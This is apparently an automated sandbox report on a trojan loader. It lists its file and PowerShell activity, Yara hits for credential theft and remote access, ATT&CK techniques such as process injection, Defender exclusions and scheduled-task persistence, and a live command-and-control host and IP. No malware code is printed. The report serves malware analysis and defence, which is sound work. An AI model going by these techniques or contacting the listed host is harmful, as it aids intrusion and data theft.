                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Queries volume information: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Queries volume information: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d51004.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d99478.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.xNgpESfQOvfb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d99478.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 672, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 5332, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: xNgpESfQOvfb.exe PID: 7084, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: xNgpESfQOvfb.exe PID: 380, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d51004.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d99478.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.2.xNgpESfQOvfb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d99478.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 672, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 5332, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: xNgpESfQOvfb.exe PID: 7084, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: xNgpESfQOvfb.exe PID: 380, type: MEMORYSTR
                    MITRE ATT&CK Matrix (techniques listed per tactic; a leading number marks a technique flagged in this analysis, the number being the count of matched signatures):

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                    Execution: 11 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                    Persistence: 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Privilege Escalation: 111 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 131 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading
                    Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                    Discovery: 211 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                    Collection: 1 Input Capture; 11 Archive Collected Data; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                    Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1476041
                    Sample: SecuriteInfo.com.TrojanLoad...
                    Startdate: 18/07/2024 | Architecture: WINDOWS | Score: 100

                    Root node (2):
                    DNS/IP: moneymaker-30608.portmap.host
                    Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures
                    Started: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe 7 (node 8); xNgpESfQOvfb.exe 5 (node 12)

                    Node 8, SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe:
                    Dropped: C:\Users\user\AppData\...\xNgpESfQOvfb.exe, PE32; C:\Users\...\xNgpESfQOvfb.exe:Zone.Identifier, ASCII; C:\Users\user\AppData\Local\...\tmpA395.tmp, XML; SecuriteInfo.com.T....29424.1974.exe.log, ASCII
                    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
                    Started: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe 6 (node 14); powershell.exe 23 (node 18); powershell.exe 23 (node 21); schtasks.exe 1 (node 23)

                    Node 12, xNgpESfQOvfb.exe:
                    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
                    Started: schtasks.exe (node 25); xNgpESfQOvfb.exe (node 27); xNgpESfQOvfb.exe (node 29)

                    Node 14, SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe:
                    DNS/IP: moneymaker-30608.portmap.host 193.161.193.99, 30608, 49717 BITREE-ASRU Russian Federation
                    Dropped: C:\Users\user\AppData\Roaming\XClient.exe, PE32

                    Node 18, powershell.exe:
                    Signatures: Loading BitLocker PowerShell Module
                    Started: conhost.exe (node 31); WmiPrvSE.exe (node 33)

                    Node 21, powershell.exe: started conhost.exe (node 35)
                    Node 23, schtasks.exe: started conhost.exe (node 37)
                    Node 25, schtasks.exe: started conhost.exe (node 39)

                    Source | Detection | Scanner | Label | Link
                    SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | 32% | ReversingLabs | |
                    SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | 100% | Joe Sandbox ML | |
                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\XClient.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\XClient.exe | 32% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | 32% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                    moneymaker-30608.portmap.host | 100% | Avira URL Cloud | phishing |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    moneymaker-30608.portmap.host | 193.161.193.99 | true | true | | unknown
                      Name | Malicious | Antivirus Detection | Reputation
                      moneymaker-30608.portmap.host | true | Avira URL Cloud: phishing | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, xNgpESfQOvfb.exe, 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      193.161.193.99 | moneymaker-30608.portmap.host | Russian Federation | | 198134 | BITREE-ASRU | true
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1476041
                      Start date and time:2024-07-18 16:28:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 10m 13s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      Detection:MAL
